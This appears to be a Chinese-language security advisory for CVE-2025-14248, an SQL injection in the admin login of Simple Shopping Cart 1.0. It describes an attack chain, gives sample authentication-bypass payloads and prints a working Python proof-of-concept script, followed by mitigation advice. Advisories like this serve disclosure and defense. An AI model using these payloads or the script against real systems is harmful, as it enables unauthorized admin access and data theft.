CVE-2025-14248 CVSS 7.3 高危

CVE-2025-14248 Simple Shopping Cart 1.0 adminlogin.php SQL注入漏洞

披露日期: 2025-12-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-14248

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Simple Shopping Cart 1.0

漏洞概述

CVE-2025-14248是code-projects Simple Shopping Cart 1.0版本中的高危SQL注入漏洞。该漏洞存在于管理后台登录页面（adminlogin.php），攻击者可通过构造恶意的admin_username参数值绕过身份验证。成功利用此漏洞可导致未授权访问管理后台，窃取敏感数据或进一步入侵系统。由于该漏洞可远程利用且无需认证，对互联网暴露的系统构成严重威胁。漏洞已被公开披露并存在可用的利用代码，建议立即采取修复措施。

技术细节

该SQL注入漏洞位于Simple Shopping Cart 1.0的/adminlogin.php文件中，具体是admin_username参数存在过滤不严。当用户提交登录表单时，后端程序直接将admin_username参数值拼接到SQL查询语句中，未进行充分的输入验证或参数化查询。攻击者可通过在admin_username字段中注入SQL恶意代码，如使用单引号闭合原语句并构造UNION SELECT或布尔盲注等技巧，获取数据库中的敏感信息或绕过认证机制。CVSS 3.1评分7.3（高危），攻击向量为网络层面，无需认证即可发起攻击，对机密性、完整性和可用性均造成较低影响。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用Simple Shopping Cart 1.0，访问/adminlogin.php管理登录页面

STEP 2

步骤2

在admin_username参数中注入SQL恶意载荷，如admin' OR '1'='1

STEP 3

步骤3

提交表单后，恶意SQL代码被拼接到数据库查询中执行

STEP 4

步骤4

通过SQL注入绕过正常认证流程，成功登录管理后台

STEP 5

步骤5

获取管理权限后，可窃取数据库敏感信息、上传恶意文件或进一步控制服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14248 SQL Injection PoC for Simple Shopping Cart 1.0
# Target: /adminlogin.php
# Parameter: admin_username

target_url = "http://target-site.com/adminlogin.php"

# Basic SQL Injection payloads for authentication bypass
payloads = [
    "admin' OR '1'='1",
    "admin' OR '1'='1' --",
    "admin' OR '1'='1' #",
    "' OR '1'='1' --",
    "admin' UNION SELECT 1,2,3--",
    "' OR 1=1 LIMIT 1--",
]

def test_sqli(url, payload):
    """Test SQL injection vulnerability"""
    data = {
        'admin_username': payload,
        'admin_password': 'any',
        'login': 'submit'
    }
    try:
        response = requests.post(url, data=data, timeout=10)
        # Check for successful login indicators
        if 'dashboard' in response.text.lower() or 'admin' in response.url:
            return True, payload
    except Exception as e:
        print(f"Error: {e}")
    return False, None

# Run PoC
for payload in payloads:
    success, used_payload = test_sqli(target_url, payload)
    if success:
        print(f"[+] SQL Injection Successful with payload: {used_payload}")
        break

影响范围

code-projects Simple Shopping Cart 1.0

防御指南

临时缓解措施

立即限制对/adminlogin.php页面的访问，使用IP白名单或VPN访问管理后台；在Web应用层部署WAF规则阻止SQL注入特征载荷；临时措施可禁用管理后台或设置严格的访问控制，待官方发布修复补丁后及时升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14248
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14248
3 Details https://www.cvedetails.com/cve/CVE-2025-14248/
4 VulDB https://vuldb.com/cve/CVE-2025-14248
5 Link https://code-projects.org/
6 Link https://github.com/zzb1388/cve/issues/92
7 Link https://vuldb.com/?ctiid.334758
8 Link https://vuldb.com/?id.334758
9 Link https://vuldb.com/?submit.702464
10 Link https://github.com/zzb1388/cve/issues/92

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表